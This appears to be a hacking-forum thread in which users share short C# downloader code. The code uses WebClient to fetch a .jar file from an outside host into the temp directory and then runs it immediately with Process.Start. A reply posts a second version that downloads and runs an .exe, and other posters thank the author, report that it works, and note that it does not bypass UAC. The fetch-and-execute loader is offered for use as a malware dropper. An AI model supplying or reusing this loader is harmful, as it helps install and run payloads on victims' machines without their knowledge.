Code:
var webClient = new WebClient();
webClient.DownloadFile("http://barbados.plunder.com/x/$8BKFwC7zYRVvZf6kxTJp2IBNlSROKcWS/e6f0a6d152/?/jLoader.jar", Path.GetTempPath() + "jLoader.jar");
Process.Start(Path.GetTempPath() + "jLoader.jar");
Simple code
uses webbrowser.
so it will use system.diagnostics.
and system.net
Another thanks for you.
Thanks for this contribution
What's up with it using java files?
Is it an example of the file we want to run?
(09-15-2010, 08:16 PM)`P R O D I G Y™ Wrote: [ -> ]What's up with it using java files?
Is it an example of the file we want to run?
yes.
Thanks man! Appreciate this, going to try it out
--
Works great, thanks
i should use also this:
Code:
WebClient client = new WebClient();
client.DownloadFile("http://site/test.exe", Path.GetTempPath() + "test.exe");
Process.Start(Path.GetTempPath() + "test.exe");
Tested and it work..Thanks for your share.
This doesn't bypass UAC... All this does is download a file into the temp directory which you don't need elevated privileges to do.
Cool thanks for the code. Keep contributing your doing good.
Agreeing with KoBE, this is very true. Temp downloaded files don't need UAC because they get deleted 24/7
.
Not the greatest piece of code i've seen. All it does is downloads a file then runs it ASAP.